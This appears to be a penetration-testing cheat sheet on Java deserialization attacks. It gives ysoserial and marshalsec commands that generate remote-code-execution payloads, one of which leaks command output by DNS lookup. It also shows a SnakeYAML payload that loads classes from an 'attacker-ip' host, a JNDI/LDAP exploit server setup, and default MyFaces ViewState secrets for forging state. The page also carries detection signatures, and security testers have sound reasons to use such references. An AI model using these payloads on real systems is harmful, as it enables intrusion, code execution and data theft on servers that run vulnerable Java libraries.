Skip to content

Java Deserialization

Java serialization is the process of converting a Java object’s state into a byte stream, which can be stored or transmitted and later reconstructed (deserialized) back into the original object. Serialization in Java is primarily done using the Serializable interface, which marks a class as serializable, allowing it to be saved to files, sent over a network, or transferred between JVMs.

Summary

Detection

  • "AC ED 00 05" in Hex
    • AC ED: STREAM_MAGIC. Specifies that this is a serialization protocol.
    • 00 05: STREAM_VERSION. The serialization version.
  • "rO0" in Base64
  • Content-Type = "application/x-java-serialized-object"
  • "H4sIAAAAAAAAAJ" in gzip(base64)

Tools

Ysoserial

frohoff/ysoserial : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64

List of payloads included in ysoserial:

Payload Authors Dependencies
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-libđź«™jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4

Burp extensions

Alternative Tooling

  • pwntester/JRE8u20_RCE_Gadget - Pure JRE 8 RCE Deserialization gadget
  • joaomatosf/JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
  • pimps/ysoserial-modified - A fork of the original ysoserial application
  • NickstaDB/SerialBrute - Java serialization brute force attack tool
  • NickstaDB/SerializationDumper - A tool to dump Java serialization streams in a more human readable form
  • bishopfox/gadgetprobe - Exploiting Deserialization to Brute-Force the Remote Classpath
  • k3idii/Deserek - Python code to Serialize and Unserialize java binary serialization format.
    java -jar ysoserial.jar URLDNS http://xx.yy > yss_base.bin
    python deserek.py yss_base.bin --format python > yss_url.py
    python yss_url.py yss_new.bin
    java -cp JavaSerializationTestSuite DeSerial yss_new.bin
    
  • mbechler/marshalsec - Java Unmarshaller Security - Turning your data into code execution
    $ java -cp marshalsec.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
    $ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc"
    $ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
    // -a - generates/tests all payloads for that marshaller
    // -t - runs in test mode, unmarshalling the generated payloads after generating them.
    // -v - verbose mode, e.g. also shows the generated payload in test mode.
    // gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller.
    // arguments - Gadget specific arguments
    

Payload generators for the following marshallers are included:

Marshaller Gadget Impact
BlazeDSAMF(0|3|X) JDK only escalation to Java serialization various third party libraries RCEs
Hessian|Burlap various third party RCEs
Castor dependency library RCE
Jackson possible JDK only RCE, various third party RCEs
Java yet another third party RCE
JsonIO JDK only RCE
JYAML JDK only RCE
Kryo third party RCEs
KryoAltStrategy JDK only RCE
Red5AMF(0|3) JDK only RCE
SnakeYAML JDK only RCEs
XStream JDK only RCEs
YAMLBeans third party RCE

YAML Deserialization

SnakeYAML is a popular Java-based library used for parsing and emitting YAML (YAML Ain't Markup Language) data. It provides an easy-to-use API for working with YAML, a human-readable data serialization standard commonly used for configuration files and data exchange.

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://attacker-ip/"]
  ]]
]

ViewState

In Java, ViewState refers to the mechanism used by frameworks like JavaServer Faces (JSF) to maintain the state of UI components between HTTP requests in web applications. There are 2 major implementations:

  • Oracle Mojarra (JSF reference implementation)
  • Apache MyFaces

Tools:

Encoding

Encoding Starts with
base64 rO0
base64 + gzip H4sIAAA

Storage

The javax.faces.STATE_SAVING_METHOD is a configuration parameter in JavaServer Faces (JSF). It specifies how the framework should save the state of a component tree (the structure and data of UI components on a page) between HTTP requests.

The storage method can also be inferred from the viewstate representation in the HTML body.

  • Server side storage: value="-XXX:-XXXX"
  • Client side storage: base64 + gzip + Java Object

Encryption

By default MyFaces uses DES as encryption algorithm and HMAC-SHA1 to authenticate the ViewState. It is possible and recommended to configure more recent algorithms like AES and HMAC-SHA256.

Encryption Algorithm HMAC
DES ECB (default) HMAC-SHA1

Supported encryption methods are BlowFish, 3DES, AES and are defined by a context parameter. The value of these parameters and their secrets can be found inside these XML clauses.

<param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>   
<param-name>org.apache.myfaces.SECRET</param-name>   
<param-name>org.apache.myfaces.MAC_SECRET</param-name>

Common secrets from the documentation.

Name Value
AES CBC/PKCS5Padding NzY1NDMyMTA3NjU0MzIxMA==
DES NzY1NDMyMTA=<
DESede MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz
Blowfish NzY1NDMyMTA3NjU0MzIxMA
AES CBC MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz
AES CBC IV NzY1NDMyMTA3NjU0MzIxMA==
  • Encryption: Data -> encrypt -> hmac_sha1_sign -> b64_encode -> url_encode -> ViewState
  • Decryption: ViewState -> url_decode -> b64_decode -> hmac_sha1_unsign -> decrypt -> Data

References